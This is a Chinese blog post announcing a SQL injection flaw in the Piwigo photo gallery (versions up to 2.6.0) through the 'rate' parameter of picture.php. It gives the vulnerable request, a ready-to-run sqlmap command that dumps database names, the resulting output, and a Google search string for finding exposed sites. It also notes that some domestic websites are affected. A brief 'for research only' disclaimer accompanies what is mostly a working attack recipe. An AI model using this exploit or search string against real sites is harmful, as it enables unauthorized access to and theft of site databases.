免费开源相册Piwigo <= v2.6.0 SQL注入漏洞(0day)

141598052312651

Piwigo是世界上最著名的免费开源相册系统之一,由PHP+MySQL架构。由于该框架搭建方便,受到国内外的开发者青睐,近日,Piwigo <= v2.6.0爆出重要0day漏洞。

漏洞成因,Piwigo相册系统的/piwigo/picture.php页面,没有完整的验证jQuery参数。攻击者成功利用该漏洞,可以获取数据库的全部信息,漏洞及其简单暴力。

漏洞影响范围,Piwigo <= v2.6.0。

漏洞POC 本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

/piwigo/picture.php?/1/category/1&action=rate (POST parameter: rate=1)

Exploiting with SQLMap:

python sqlmap.py -u “http://192.168.244.129/piwigo/picture.php?/1/category/1&action=rate”; –data
“rate=1” –dbs

[16:32:25] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[16:32:25] [INFO] fetching database names
[16:32:25] [INFO] fetching number of databases
[16:32:25] [INFO] resumed: 4
[16:32:25] [INFO] resumed: information_schema
[16:32:25] [INFO] resumed: mysql
[16:32:25] [INFO] resumed: phpmyadmin
[16:32:25] [INFO] resumed: piwigo
available databases [4]:
[*] information_schema
[*] mysql
[*] phpmyadmin
[*] piwigo

国内部分网站受该漏洞影响,截图

111R131U-0

Google关键字:inurl:piwigo/picture.php

原创文章转载请注明:转载自 七行者博客

本文固定链接: https://www.qxzxp.com/5670.html

免费开源相册Piwigo <= v2.6.0 SQL注入漏洞(0day):等您坐沙发呢!

发表评论

2 + 0 =

快捷键:Ctrl+Enter